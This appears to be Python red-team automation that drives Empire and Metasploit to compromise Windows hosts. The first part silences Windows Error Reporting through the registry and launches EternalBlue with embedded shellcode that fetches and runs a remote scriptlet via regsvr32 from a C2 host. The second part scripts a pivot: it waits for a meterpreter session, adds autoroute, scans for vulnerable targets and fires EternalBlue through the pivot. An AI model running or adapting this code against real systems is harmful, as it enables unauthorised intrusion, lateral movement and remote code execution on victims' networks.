return None # Suppress WER error UI to make it "silent" opts = { 'Agent': agent_name, 'command': """Set-ItemProperty -Path "Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting" -Name DontShowUI -Value 1""" } results = API.agent_run_shell_cmd_with_result(agent_name, opts) # Fire EternalBlue from Empire which is basically the same Invoke-EternalBlue # will most likely crash remove target opts = exploitation.exploit_eternalblue.options target_ip = API.agent_info(agent_name)['agents'][0]['internal_ip'] param = { opts.required_agent: agent_name, opts.required_initialgrooms: 12, opts.required_maxattempts: 1, opts.required_shellcode: shellcode, opts.required_target: target_ip } API.module_exec(exploitation.exploit_eternalblue.path, param) return "launched externalblue! Pls wait for agent..." if __name__ == '__main__': # unit test API = empireAPI(EMPIRE_SERVER, uname=EMPIRE_USER, passwd=EMPIRE_PWD) # used msfvenom -p windows/x64/exec CMD="regsvr32... launcher.sct scrobj.dll" -f powershell # tried a larger shellcode that does powershell with base64 payload.. crashed target # nice integration will be to precede this technique with execution of metasploit msfvenom shellcode = "0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x48,0x8d,0x8d,0x1,0x1,0x0,0x0,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5,0x72,0x65,0x67,0x73,0x76,0x72,0x33,0x32,0x2e,0x65,0x78,0x65,0x20,0x2f,0x73,0x20,0x2f,0x75,0x20,0x2f,0x6e,0x20,0x2f,0x69,0x3a,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x65,0x6d,0x70,0x69,0x72,0x65,0x63,0x32,0x3a,0x38,0x30,0x30,0x30,0x2f,0x6c,0x2e,0x73,0x63,0x74,0x20,0x73,0x63,0x72,0x6f,0x62,0x6a,0x2e,0x64,0x6c,0x6c,0x0" print(run(API, API.agents()['agents'][0]['name'], shellcode))
2. Start MSF autoroute on pivot node 3. Do a vulnerable (to EternalBlue) target(s) scan 4. Launch EternalBlue thru pivot to adjacent target 5. Wait for Empire session from earlier step """ from c2_settings import * from EmpireAPIWrapper import empireAPI from pymetasploit.msfrpc import MsfRpcClient from stage2.external_c2 import msf_wait_for_session, empire_wait_for_agent, msf_get_timestamp, empire_get_timestamp from stage3.internal_reconn.windows import msf_eternalblue_scan from stage3.internal_c2.windows import msf_autoroute from stage3.escalate_privilege.windows import msf_eternal_blue # Set both API instances for MSF & Empire msf_API = MsfRpcClient(MSF_PWD, server=MSF_SERVER,ssl=False) empire_API = empireAPI(EMPIRE_SERVER, uname=EMPIRE_USER, passwd=EMPIRE_PWD) # Step 1 - Wait for pivot msf_session_id = msf_wait_for_session.run(msf_API) t = msf_get_timestamp.run(msf_API,msf_session_id) print(t + ' Got a meterpreter session ' + str(msf_session_id)) # Step 2 - Setup autoroute on pivot pivot_range = '' routes = msf_autoroute.run(msf_API, msf_session_id) t = msf_get_timestamp.run(msf_API,msf_session_id) print(t + 'Added route(s): ' + str(routes)) for r in routes: if '255.255.255.0' in r: # 1-254 takes a long time to scan pivot_range = r.replace('.0/255.255.255.0','.100-210') break # assume 1 class C network in test environment